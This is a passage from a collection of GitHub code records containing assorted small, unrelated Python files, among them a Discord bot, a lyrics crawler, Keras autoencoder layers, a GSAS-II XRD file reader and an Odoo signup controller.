tranu.shared.font\nimport tranu.tpyglet.colors\nimport pyglet\n\n\nclass TFont(tranu.shared.font.SharedFont):\n\n def __init__(self, size):\n super().__init__(size)\n\n self._family = \"Arial\"\n self._label = None\n\n def load(self, path, sysfont=True):\n self._label = pyglet.text.Label(font_name=path, font_size=self._size)\n\n def draw(self, window, text, x, y, color=tranu.tpyglet.colors.RED):\n self._label.text = text\n self._label.x = x\n self._label.y = window.height - y\n self._label.color = (*color, 255) if len(color)==3 else color\n\n self._label.draw()\n","repo_name":"matimar94/tranu","sub_path":"tpyglet/font.py","file_name":"font.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9914896839","text":"import discord\r\n# import os\r\nfrom discord.ext import commands\r\n# from keep_alive import keep_alive\r\nimport random\r\n\r\nclass Config:\r\n\r\n token = 'Put your token here'\r\n prefix = ';;'\r\n\r\n\r\nintents = discord.Intents.all()\r\nclient = commands.Bot(command_prefix=Config.prefix, intents=intents)\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('IM ONLINE')\r\n\r\n\r\n@client.command()\r\nasync def cmd(ctx):\r\n colors = [0x00FF00, 0xFF0000, 0x0000FF, 0x00CECE]\r\n titles = [\"(●'◡'●)\", \"(❁´◡`❁)\", \"༼ つ ◕_◕ ༽つ\", \"(☞゚ヮ゚)☞\" , \"☜(゚ヮ゚☜)\" , \"(⌐■_■)\"]\r\n my_embed = discord.Embed(\r\n title=random.choice(titles),\r\n colour=random.choice(colors)\r\n )\r\n await ctx.send(embed=my_embed)\r\n\r\n\r\n@client.command()\r\nasync def greet(ctx):\r\n mention = ctx.author.mention\r\n await ctx.send(f'>>> Salam {mention}...Chekhabar??')\r\n\r\n\r\n@client.command()\r\nasync def setstatus(ctx, status_type):\r\n if status_type == 'idle':\r\n await client.change_presence(status=discord.Status.idle)\r\n await ctx.send(f'>>> Im Idle')\r\n elif status_type == 'dnd':\r\n await client.change_presence(status=discord.Status.dnd)\r\n await ctx.send(f'>>> Im Busy!!!')\r\n elif status_type == 'offline':\r\n await client.change_presence(status=discord.Status.offline)\r\n await ctx.send(f'>>> GOOD BYE!!!')\r\n else:\r\n await client.change_presence(status=discord.Status.online)\r\n await ctx.send(f'>>> Amade be anjam dasturat.!')\r\n\r\n\r\n@client.command()\r\nasync def setactivity(ctx, activity_type, *, activity_text):\r\n if activity_type == 'playing':\r\n await client.change_presence(activity=discord.Game(name=activity_text))\r\n await ctx.send(f'>>> Daram bazi mikonam')\r\n elif activity_type == 'streaming':\r\n await client.change_presence(activity=discord.Streaming(name=activity_text, url='https://twitch.tv/twitch'))\r\n await ctx.send(f'>>> Daram stream mikonam')\r\n elif activity_type == 'watching':\r\n await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=activity_text))\r\n await ctx.send(f'>>> Daram film mibinam')\r\n elif activity_type == 'listening':\r\n await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=activity_text))\r\n await ctx.send(f'>>> Daram ahang gush midam')\r\n else:\r\n await ctx.send(f'>>> in kalame ro **``{activity_type}``** dar dastoratam nadaram')\r\n\r\n\r\n@client.command()\r\nasync def clear(ctx, count='1'):\r\n await ctx.channel.purge(limit=int(count)+1)\r\n await ctx.send(f'>>> {count} payam ro barat pak kardam.')\r\n\r\n\r\n# keep_alive()\r\nclient.run(Config.token)\r\n","repo_name":"Danial-Salami/Discord_Bot_Project","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"44062588052","text":"import config\nimport requests\nimport random\nimport time\nfrom utils import create_folder, extract_link, get_name, LOG\n\ntry:\n from BeautifulSoup import BeautifulSoup\nexcept ImportError:\n from bs4 import BeautifulSoup\n\n\ncreate_folder([config.LYRICS_FOLDER])\n\n\ndef get_lyrics(url):\n resp = requests.get(url)\n parsed_html = BeautifulSoup(resp.content, features=\"html.parser\")\n text = parsed_html.select('.col-xs-12.col-lg-8.text-center')[0].text\n return text\n\n\ndef crawler():\n counter = 1\n for url_ref in config.FULL_URLS:\n resp = requests.get(url_ref)\n if resp.status_code == 200:\n _, name = get_name(url_ref)\n # Ensure folder exists\n folter_path = create_folder([config.LYRICS_FOLDER, name])\n # Get all links\n parsed_html = BeautifulSoup(resp.content, features='html.parser')\n lyrics_links = parsed_html.select('.listalbum-item a')\n LOG.info(f\"Number of {name.upper()} songs: {len(lyrics_links)}\")\n\n lyric_paths = [extract_link(link) for link in lyrics_links]\n\n for lyric_path in lyric_paths:\n\n try:\n writer, song_name = get_name(lyric_path)\n if name != writer:\n alt_folder = create_folder([config.LYRICS_FOLDER, writer])\n lyrics_file = alt_folder.joinpath(song_name + '.txt')\n file_found = lyrics_file.is_file()\n else:\n writer = name\n lyrics_file = folter_path.joinpath(song_name + '.txt')\n file_found = lyrics_file.is_file()\n\n if not file_found:\n # url = config.BASE_URL + lyric_path\n text = get_lyrics(lyric_path).strip()\n LOG.info(\"Downloading (\" + str(counter).zfill(3) +\n f\") [{writer}]: {song_name}\")\n counter += 1\n\n with open(lyrics_file, \"w\") as f:\n f.write(text)\n time.sleep(config.CRAWLER_WAIT + config.CRAWLER_WAIT * random.random())\n\n except IndexError:\n LOG.error(f\"Access denied while scraping: {lyric_path} \\n\"\n f\"Try increasing the waiting time.\\n\"\n f\"Finishing the scrapping for the moment. Try to access on your browser to unblock access\")\n return\n except Exception as err:\n print(f\"ERROR: {lyric_path}: {err}\")\n\n else:\n LOG.warning(f\"Unable to load: {url_ref}\")\n\n\nif __name__ == '__main__':\n crawler()\n","repo_name":"jgdelrio/pyrhymes","sub_path":"pyrhymes/lyrics_crawler.py","file_name":"lyrics_crawler.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36895303631","text":"class Map():\n def __init__(self, key):\n self.key = key\n self.load_map_keys()\n self.load_map_data()\n\n def load_map_keys(self):\n self.map_keys = {\"\\n\" : \"new_z_level\"}\n f = open(f\"data/keys.txt\")\n key = \"\"\n value = \"\"\n value_done = False\n for i in f.read():\n if i != \"\\n\":\n if i == \";\":\n self.map_keys[key] = value\n value = \"\"\n key = \"\"\n value_done = False\n\n if value_done == True:\n key += i\n\n if i == \":\":\n value_done = True\n\n if i != \":\" and value_done == False and i != \";\":\n value += i \n \n\n def load_map_data(self):\n self.map_data = []\n f = open(f\"data/{self.key}.txt\")\n temp_row = []\n temp_z_level = []\n for i in f.read():\n if self.map_keys[i] == \"new_z_level\":\n temp_z_level.append(temp_row)\n temp_row = []\n elif self.map_keys[i] == \"new_y_level\":\n self.map_data.append(temp_z_level)\n else:\n temp_row.append(self.map_keys[i])\n\n \n def build_from_map_data(self):\n self.blocks = []\n for y in map.map_data:\n for z in y:\n for x in z:\n pass\n\nmap = Map(\"scene2\")\nfor y in map.map_data:\n for z in y:\n for x in z:\n print(x, end = \"\")\n print()\n print()\n","repo_name":"Alox-23/panda3d-game","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42625533468","text":"def get_user_input():\n # Accept a list of 10 numbers from the user\n numbers = []\n for i in range(10):\n while True:\n try:\n num = int(input(f\"Enter a number {i + 1}: \"))\n numbers.append(num)\n break\n except ValueError:\n print(\"Invalid input. Please enter a valid number.\")\n\n return numbers\nnumbers = get_user_input()\n\ndef display_list(numbers):\n # Display the entered list\n print(\"Entered list:\", numbers)\n\ndisplay_list(numbers)\n\ndef calculate_mean(numbers):\n # Calculate the mean\n mean = sum(numbers) / len(numbers)\n print(\"Calculated mean: \", mean)\n\ncalculate_mean(numbers)\n\ndef calculate_median(numbers):\n # Calculate the median\n sorted_numbers = sorted(numbers)\n n = len(sorted_numbers)\n if n % 2 == 0:\n median = (sorted_numbers[n // 2 - 1] + sorted_numbers[n // 2]) / 2\n else:\n median = sorted_numbers[n // 2]\n\n print(\"Calculated median: \", median)\n\ncalculate_median(numbers)","repo_name":"helen751/python_class","sub_path":"test-func.py","file_name":"test-func.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74925658012","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 30 12:56:42 2019\r\n\r\n@author: Graham\r\n\"\"\"\r\n\r\nimport cv2\r\ndef emptyFunction():\r\n pass\r\n\r\ndef main():\r\n imgp = \"E:\\\\OCV\\\\Images\\\\misc\\\\4.2.01.tiff\"\r\n imgp2 = \"E:\\\\OCV\\\\Images\\\\misc\\\\4.2.02.tif\"\r\n img1 = cv2.imread(imgp, 1)\r\n img2 = cv2.imread(imgp2, 1)\r\n \r\n alpha = 0.5\r\n beta = 0.5\r\n gamma = 0\r\n \r\n output = cv2.addWeighted(img1, alpha, img2, beta, gamma)\r\n \r\n windowName = \"Transition Demo\"\r\n cv2.namedWindow(windowName)\r\n \r\n cv2.createTrackbar('Alpha', windowName, 0, 10, emptyFunction)\r\n while True:\r\n cv2.imshow(windowName, output)\r\n \r\n alpha = cv2.getTrackbarPos('Alpha', windowName) / 10\r\n beta = 1 - alpha\r\n gamma = 0\r\n \r\n output = cv2.addWeighted(img1, alpha, img2, beta, gamma)\r\n print(alpha, beta)\r\n \r\n if cv2.waitKey(1) == 27:\r\n break\r\n \r\n cv2.destroyAllWindows()\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"grahampawar/OCV","sub_path":"OCV/Matpolib/SubPlot/P5.py","file_name":"P5.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15016134917","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nclass Session:\n \"\"\"\n Session object\n \"\"\"\n\n def __init__(self, id=None, application_id=None, created_at=None,\n nonce=None, token=None, device_id=None,\n ts=None, updated_at=None, user_id=None):\n self.id = id\n self.application_id = application_id\n self.created_at = created_at\n self.nonce = nonce\n self.token = token\n self.device_id = device_id\n self.ts = ts\n self.updated_at = updated_at\n self.user_id = user_id\n\n if not id and not token:\n raise ValueError(\"Session must have ID or token\")\n\n @staticmethod\n def from_dict(dict_data):\n if not dict_data:\n return None\n session = dict_data.get('session')\n\n return Session(\n id=session.get('id'),\n application_id=session.get('application_id'),\n created_at=session.get('created_at'),\n nonce=session.get('nonce'),\n token=session.get('token'),\n device_id=session.get('device_id'),\n ts=session.get('ts'),\n updated_at=session.get('updated_at'),\n user_id=session.get('user_id'),\n )\n\n def as_dict(self):\n return {\n 'id': self.id,\n 'application_id': self.application_id,\n 'created_at': self.created_at,\n 'nonce': self.nonce,\n 'token': self.token,\n 'device_id': self.device_id,\n 'ts': self.ts,\n 'updated_at': self.updated_at,\n 'user_id': self.user_id,\n }\n","repo_name":"shbodya/quickblox-python-sdk","sub_path":"QuickBlox/Sessions.py","file_name":"Sessions.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69992942492","text":"from keras.models import Model\r\nfrom keras.layers import Input, Conv2D, Activation, BatchNormalization, Flatten, Dense, Conv2DTranspose, Reshape\r\nfrom utils import get_channels_axis\r\n\r\n\r\ndef conv_encoder(input_side=32, n_channels=3, representation_dim=256, representation_activation='tanh',\r\n intermediate_activation='relu'):\r\n nf = 64\r\n input_shape = (n_channels, input_side, input_side) if get_channels_axis() == 1 else (input_side, input_side,\r\n n_channels)\r\n\r\n x_in = Input(shape=input_shape)\r\n enc = x_in\r\n\r\n # downsample x0.5\r\n enc = Conv2D(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n # downsample x0.5\r\n enc = Conv2D(nf * 2, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n # downsample x0.5\r\n enc = Conv2D(nf * 4, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n if input_side == 64:\r\n # downsample x0.5\r\n enc = Conv2D(nf * 8, kernel_size=(3, 3), strides=(2, 2), padding='same')(enc)\r\n enc = BatchNormalization(axis=get_channels_axis())(enc)\r\n enc = Activation(intermediate_activation)(enc)\r\n\r\n enc = Flatten()(enc)\r\n rep = Dense(representation_dim, activation=representation_activation)(enc)\r\n\r\n return Model(x_in, rep)\r\n\r\n\r\ndef conv_decoder(output_side=32, n_channels=3, representation_dim=256, activation='relu'):\r\n nf = 64\r\n\r\n rep_in = Input(shape=(representation_dim,))\r\n\r\n g = Dense(nf * 4 * 4 * 4)(rep_in)\r\n g = BatchNormalization(axis=-1)(g)\r\n g = Activation(activation)(g)\r\n\r\n conv_shape = (nf * 4, 4, 4) if get_channels_axis() == 1 else (4, 4, nf * 4)\r\n g = Reshape(conv_shape)(g)\r\n\r\n # upsample x2\r\n g = Conv2DTranspose(nf * 2, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = BatchNormalization(axis=get_channels_axis())(g)\r\n g = Activation(activation)(g)\r\n\r\n # upsample x2\r\n g = Conv2DTranspose(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = BatchNormalization(axis=get_channels_axis())(g)\r\n g = Activation(activation)(g)\r\n\r\n if output_side == 64:\r\n # upsample x2\r\n g = Conv2DTranspose(nf, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = BatchNormalization(axis=get_channels_axis())(g)\r\n g = Activation(activation)(g)\r\n\r\n # upsample x2\r\n g = Conv2DTranspose(n_channels, kernel_size=(3, 3), strides=(2, 2), padding='same')(g)\r\n g = Activation('tanh')(g)\r\n\r\n return Model(rep_in, g)\r\n\r\n\r\n","repo_name":"izikgo/AnomalyDetectionTransformations","sub_path":"models/encoders_decoders.py","file_name":"encoders_decoders.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"32"} +{"seq_id":"22732122760","text":"import random\r\n\r\n#三目並べの座標をリストで表現\r\nBoard=[0,1,2,3,4,5,6,7,8]\r\n\r\n#座標の表示間隔\r\na=0\r\nb=3\r\n\r\n\r\n#座標表示の関数\r\ndef coordinate(a,b):\r\n for i in range(0,3):\r\n print(Board[a:b])\r\n a=a+3\r\n b=b+3\r\n print()\r\n\r\n#プレイヤー種類\r\nstatus=[0,1]\r\n\r\n#先攻はユーザー側(初期値)\r\np_type=status[0]\r\n\r\n#勝敗決定フラグ(endは値参照・更新にglobal endが必要)\r\nend=0\r\n\r\n#プレイヤー交代の関数\r\ndef playertype(p_type):\r\n global end\r\n if end==0 and p_type==status[0]:\r\n p_type=status[1]\r\n print(\"現在のターン:CPU\")\r\n \r\n \r\n elif end==0 and p_type==status[1]:\r\n p_type=status[0]\r\n print(\"現在のターン:あなた\")\r\n \r\n \r\n\r\n#共通動作×\r\ndef func(p_type):\r\n global end\r\n if end==0 and p_type==status[0]:#ユーザーターン\r\n print(\"座標を入力してください:\",end=\"\")\r\n select=int(input())#座標のキー入力をintで与える\r\n \r\n #選択した座標が埋まっているかチェック\r\n while Board[select] =='o' or Board[select]=='x':\r\n print('選択できません。座標を選びなおしてください:',end=\"\")\r\n select=int(input())\r\n \r\n \r\n else:\r\n Board[select]='o' \r\n coordinate(a,b)\r\n print()\r\n \r\n \r\n elif end==0 and p_type==status[1]:#CPUターン\r\n select=random.randint(0,8)\r\n \r\n #選択した座標が埋まっているかチェック\r\n while Board[select] =='o' or Board[select]=='x':\r\n #print(\"座標を再選択してください\")\r\n select=random.randint(0,8)\r\n \r\n \r\n else:\r\n Board[select]='x' \r\n coordinate(a,b)\r\n print()\r\n\r\n \r\n\r\n\r\n#勝利判定\r\ndef win():\r\n global end\r\n if end==0:\r\n judge=[[0, 1, 2],[3, 4, 5],[6, 7, 8],[0, 3, 6],[1, 4, 7],[2, 5, 8],[0, 4, 8],[2, 4, 6],]\r\n for j in range(0,8):\r\n f=judge[j][0] #1\r\n s=judge[j][1] #4\r\n t=judge[j][2] #7\r\n parts=[f,s,t] #[1,4,7]\r\n \r\n \r\n if Board[f]==Board[s] and Board[s]==Board[t]:\r\n print(\"%dの勝ち\"%p_type)\r\n end=1\r\n \r\n \r\n #Boardがどこまで埋まったかチェック\r\n #print(\"チェック%d\"%j)\r\n #print(Board)\r\n \r\n\r\n\r\n#ゲーム進行\r\nprint(\"初期盤面\")\r\ncoordinate(a,b)\r\nprint(\"ゲーム開始\")\r\n\r\n\r\nwhile True:\r\n \r\n #先攻=ユーザ\r\n func(status[0])\r\n #勝利判定\r\n win() \r\n #攻守交代 \r\n playertype(status[0])\r\n \r\n #後攻=CPU \r\n func(status[1])\r\n #勝利判定\r\n win() \r\n #攻守交代\r\n playertype(status[1])","repo_name":"Bnashimeji/sample01","sub_path":"三目並べ 完成版.py","file_name":"三目並べ 完成版.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24965309740","text":"from django.db import models\n\n# Create your models here.\n\nclass Leave(models.Model):\n\n def auto_comp_id(): \n no = Leave.objects.count()\n str1 = 'VSTNLEAVE'\n list2 = ['0','0','0','0','0']\n item = no+1 \n str_item = str(item) \n list_item = list(str_item) \n leng = len(list_item)\n con = 5-leng \n list2[con:] = list_item\n result = ''.join(map(str, list2))\n final = str1+result \n return final\n \n leave_choices = (\n ('sick', 'sick'),\n ('planned', 'planned'),\n ('unplanned', 'unplanned'),\n )\n status_choices = (\n ('requested', 'requested'),\n ('approved', 'approved'),\n ('declined', 'declined'),\n )\n\n leave_id = models.CharField(max_length=25, editable=False, default=auto_comp_id)\n user = models.CharField(max_length = 40)\n email = models.CharField(max_length=50)\n leave_type = models.CharField(choices=leave_choices, max_length=20, default = 'planned')\n from_date = models.DateField()\n to_date = models.DateField()\n total_no_of_leaves = models.IntegerField()\n reason = models.CharField(max_length = 100, blank=True, null = True)\n status = models.CharField(choices=status_choices, max_length =20, default = 'requested')\n date_of_apply = models.DateField(auto_now_add=True, blank = True, null=True)\n class Meta:\n ordering = ('-id',)\n verbose_name = 'Leave'\n verbose_name_plural = 'Leaves'\n\n def __str__(self):\n return self.leave_id ","repo_name":"dhanushkomari/InventoryProject","sub_path":"leave/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4597845620","text":"# Author: JD 10/12/2021\n\np = float(input(\"The principle investment: \"))\n\nr_per = float(input(\"The annual interest rate in percentage: \"))\n\nr = r_per / 100\n\nt = int(input(\"The number of years for the investment: \"))\n\nn = 12\n\na = p * (1 + r / n) ** (n * t)\n\nprint(a)","repo_name":"fp-computer-programming/case-study-applied-formulas-p22jdiao","sub_path":"cs1-2.py","file_name":"cs1-2.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5378088101","text":"#static method.\n#as we know whenever we use class function we have to give argument self ,so we used an class method in which we give an agrument cls\n#but what if we don't need anything ,we just need to add any string ,so we use static method.\nclass Employee:\n no_of_leaves=8\n def __init__(self,aname, asalary,arole):\n self.name=aname\n self.salary=asalary\n self.role=arole\n\n def printdetail(self):\n return f\"Name is {self.name} salary is {self.salary} role is {self.role}\"\n @classmethod\n def change_leaves(cls,new_leaves): #with the help of class method we can make chanages in class variable with instance variable,as it does not take\n cls.no_of_leaves=new_leaves #self it take cls.\n @classmethod\n def from_str(cls,string):\n #param= string.split(\"-\") #we can also make string split in three argument which we need name,salary,role with string.split\n #return cls(param[0],param[1],param[2]) #strin.split split with - and then we use *args which store them as a list.\n #alternative method using args\n return cls(*string.split(\"-\"))\n @staticmethod\n def printgood(string):\n print(string,\"is a very good boy\") #directly we can print aything with the help of staticmethod.\n return \"done\"\n\nharry=Employee(\"harry\",477,\"director\")\nvishal=Employee(\"vishal\",399,\"hero\")\nsahil=Employee(\"sahil\",4999,\"producer\")\naditya=Employee.from_str(\"aditya-4888-spotboy\")\nvishal.change_leaves(44)\n\nprint(vishal.printdetail())\nprint(harry.printdetail())\nprint(sahil.printdetail())\nprint(Employee.no_of_leaves)\nprint(aditya.salary)\nprint(aditya.printgood(\"vishal\"))","repo_name":"Vishal-sundar-kaira/pythonProject4","sub_path":"Pythonprojects4/oop lec 5.py","file_name":"oop lec 5.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30294982439","text":"# -*- coding: utf-8 -*-\n########### SVN repository information ###################\n# $Date: $\n# $Author: von dreele $\n# $Revision: $\n# $URL: $\n# $Id: $\n########### SVN repository information ###################\nimport os\nimport os.path as ospath\nimport xml.etree.ElementTree as ET\nimport numpy as np\nimport GSASIIIO as G2IO\nimport GSASIIpath\nGSASIIpath.SetVersionNumber(\"$Revision: $\")\nclass Panalytical_ReaderClass(G2IO.ImportPowderData):\n '''Routines to import powder data from a Pananalytical.xrdm (xml) file. \n \n '''\n def __init__(self):\n super(self.__class__,self).__init__( # fancy way to self-reference\n extensionlist=('.xrdml','.xml'),\n strictExtension=True,\n formatName = 'Panalytical xrdml (xml)',\n longFormatName = 'Panalytical powder data as *.xrdml'\n )\n self.vals = None\n self.stepsize = None\n self.skip = 0\n self.root = None\n\n # Validate the contents -- make sure we only have valid lines and set\n # values we will need for later read.\n def ContentsValidator(self, filepointer):\n self.vals = None\n self.stepsize = None\n filepointer.seek(0)\n try:\n self.root = ET.parse(filepointer).getroot()\n tag = self.root.tag\n tag = tag.split('}')[0]+'}'\n self.root.find(tag+'comment')\n \n except:\n self.errors = 'Bad xml file'\n return False\n return True\n \n def Reader(self,filename,filepointer, ParentFrame=None, **kwarg):\n 'Read a Panalytical .xrdml (.xml) file; already in self.root'\n blockNum = kwarg.get('blocknum',0)\n self.idstring = ospath.basename(filename) + ' Scan '+str(blockNum)\n x = []\n y = []\n w = []\n tag = self.root.tag\n tag = tag.split('}')[0]+'}'\n sample = self.root.find(tag+'sample')\n self.idstring = ospath.basename(filename) + ' Scan '+str(blockNum)\n dataSets = self.root.findall(tag+'xrdMeasurement')\n if blockNum-1 == len(dataSets):\n self.repeat = False\n return False\n data = dataSets[blockNum-1]\n if len(dataSets) > 1:\n self.repeat = True\n wave = data.find(tag+'usedWavelength')\n incident = data.find(tag+'incidentBeamPath')\n radius = float(incident.find(tag+'radius').text)\n tube = incident.find(tag+'xRayTube')\n scan = data.find(tag+'scan')\n header = scan.find(tag+'header')\n dataPoints = scan.find(tag+'dataPoints')\n self.comments.append('Gonio. radius=%.2f'%(radius))\n self.Sample['Gonio. radius'] = radius\n if sample.find(tag+'id').text:\n self.comments.append('Sample name='+sample.find(tag+'id').text)\n self.comments.append('Date/TimeStart='+header.find(tag+'startTimeStamp').text)\n self.comments.append('Date/TimeEnd='+header.find(tag+'endTimeStamp').text)\n self.comments.append('xray tube='+tube.attrib['name'])\n self.comments.append('Ka1=%s'%(wave.find(tag+'kAlpha1').text))\n self.comments.append('Ka2=%s'%(wave.find(tag+'kAlpha2').text))\n self.comments.append('Ka2/Ka1=%s'%(wave.find(tag+'ratioKAlpha2KAlpha1').text))\n self.comments.append('Kb=%s'%(wave.find(tag+'kBeta').text))\n self.comments.append('Voltage='+tube.find(tag+'tension').text)\n self.comments.append('Current='+tube.find(tag+'current').text)\n limits = dataPoints.find(tag+'positions')\n startPos = float(limits.find(tag+'startPosition').text)\n endPos= float(limits.find(tag+'endPosition').text)\n y = np.fromstring(dataPoints.find(tag+'intensities').text,sep=' ')\n N = y.shape[0]\n x = np.linspace(startPos,endPos,N)\n w = np.where(y>0,1./y,1.)\n self.powderdata = [\n np.array(x), # x-axis values\n np.array(y), # powder pattern intensities\n np.array(w), # 1/sig(intensity)^2 values (weights)\n np.zeros(N), # calc. intensities (zero)\n np.zeros(N), # calc. background (zero)\n np.zeros(N), # obs-calc profiles\n ]\n conditions = scan.find(tag+'nonAmbientPoints')\n if conditions:\n kind = conditions.attrib['type']\n if kind == 'Temperature':\n Temperature = float(conditions.find(tag+'nonAmbientValues').text.split()[-1])\n self.Sample['Temperature'] = Temperature\n return True\n","repo_name":"shmidt9510/NewGSAS","sub_path":"imports/G2pwd_Panalytical.py","file_name":"G2pwd_Panalytical.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12927185743","text":"# Copyright 2017 Coop IT Easy SCRLfs\r\n# Houssine Bakkali \r\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\r\nimport logging\r\nimport werkzeug\r\n\r\nfrom odoo import http\r\nfrom odoo.http import request\r\nfrom odoo.tools.translate import _\r\nfrom odoo import tools\r\n\r\nfrom odoo.addons.auth_signup.controllers.main import AuthSignupHome\r\nfrom odoo.addons.base_iban.models import res_partner_bank\r\n\r\nfrom odoo.addons.auth_signup.models.res_partner import SignupError\r\nfrom odoo.exceptions import UserError\r\nfrom odoo.exceptions import ValidationError\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\n\r\nclass AuthSignupHome(AuthSignupHome):\r\n def _signup_with_values(self, token, values):\r\n db, login, password = request.env['res.users'].sudo().signup(values,\r\n token)\r\n # as authenticate will use its own cursor we need to commit\r\n # the current transaction\r\n request.cr.commit()\r\n uid = request.session.authenticate(db, login, password)\r\n if not uid:\r\n raise SignupError(_('Authentication Failed.'))\r\n return uid\r\n\r\n def do_signup(self, qcontext):\r\n \"\"\" Shared helper that creates a res.partner out of a token \"\"\"\r\n values = dict((key, qcontext.get(key)) for key in ('login',\r\n 'name',\r\n 'lastname',\r\n 'firstname',\r\n 'password', 'phone',\r\n 'street', 'city',\r\n 'zip_code',\r\n 'country_id',\r\n 'raliment_point_id',\r\n 'delivery_point_id'\r\n ))\r\n assert any([k for k in values.values()]), \"The form was not properly filled in.\"\r\n assert values.get('password') == qcontext.get('confirm_password'), \"Passwords do not match; please retype them.\"\r\n supported_langs = [lang['code'] for lang in request.env['res.lang'].sudo().search_read([], ['code'])]\r\n if request.lang in supported_langs:\r\n values['lang'] = request.lang\r\n values['zip'] = values['zip_code']\r\n qcontext['customer'] = True\r\n qcontext['need_validation'] = True\r\n uid = self._signup_with_values(qcontext.get('token'), values)\r\n iban = qcontext.get('iban')\r\n user = request.env['res.users'].sudo().search([('id', '=', uid)])\r\n user.partner_id.write({'firstname': values['firstname'],\r\n 'lastname': values['lastname']})\r\n request.env['res.partner.bank'].sudo().create(\r\n {'partner_id': user.partner_id.id, 'acc_number': iban})\r\n request.cr.commit() # fixme\r\n return uid\r\n\r\n @http.route('/web/signup', type='http', auth='public', website=True)\r\n def web_auth_signup(self, *args, **kw):\r\n qcontext = self.get_auth_signup_qcontext()\r\n qcontext['name'] = qcontext.get('firstname','') + ' ' + qcontext.get('lastname','')\r\n\r\n if not qcontext.get('raliment_point_id', False) and \\\r\n not qcontext.get('delivery_point_id', False):\r\n qcontext['error'] = _(\"You must at least choose a Raliment or a \"\r\n \"Delivery point\")\r\n if qcontext.get('raliment_point_id', False) and \\\r\n qcontext.get('delivery_point_id', False):\r\n qcontext['error'] = _(\"You can not choose a Raliment and a \"\r\n \"Delivery point\")\r\n if qcontext.get(\"login\", False) and \\\r\n not tools.single_email_re.match(qcontext.get(\"login\", \"\")):\r\n qcontext[\"error\"] = _(\"That does not seem to be an email address.\")\r\n if qcontext.get(\"iban\", False):\r\n try:\r\n res_partner_bank.validate_iban(qcontext.get(\"iban\"))\r\n except ValidationError:\r\n qcontext[\"error\"] = _(\"Please give a correct IBAN number.\")\r\n if not qcontext.get('token') and not qcontext.get('signup_enabled'):\r\n raise werkzeug.exceptions.NotFound()\r\n\r\n if 'error' not in qcontext and request.httprequest.method == 'POST':\r\n try:\r\n self.do_signup(qcontext)\r\n # Send an account creation confirmation email\r\n if qcontext.get('token'):\r\n user_sudo = request.env['res.users'].sudo().search([('login', '=', qcontext.get('login'))])\r\n template = request.env.ref('auth_signup.mail_template_user_signup_account_created', raise_if_not_found=False)\r\n if user_sudo and template:\r\n template.sudo().with_context(\r\n lang=user_sudo.lang,\r\n auth_login=werkzeug.url_encode({'auth_login': user_sudo.email}),\r\n ).send_mail(user_sudo.id)\r\n return super(AuthSignupHome, self).web_login(*args, **kw)\r\n except UserError as e:\r\n qcontext['error'] = e.name or e.value\r\n except (SignupError, AssertionError) as e:\r\n if request.env[\"res.users\"].sudo().search([\r\n (\"login\", \"=\", qcontext.get(\"login\"))]):\r\n qcontext[\"error\"] = _(\"Another user is already registered \"\r\n \"using this email address.\")\r\n else:\r\n _logger.error(\"%s\", e)\r\n qcontext['error'] = _(\"Could not create a new account.\")\r\n if not qcontext.get('raliment_point_id', False):\r\n qcontext['raliment_point_id'] = 0\r\n if not qcontext.get('delivery_point_id', False):\r\n qcontext['delivery_point_id'] = 0\r\n qcontext['raliment_points'] = request.env['res.partner'].sudo().get_raliment_points()\r\n qcontext['delivery_points'] = request.env['res.partner'].sudo().get_delivery_points()\r\n qcontext['countries'] = 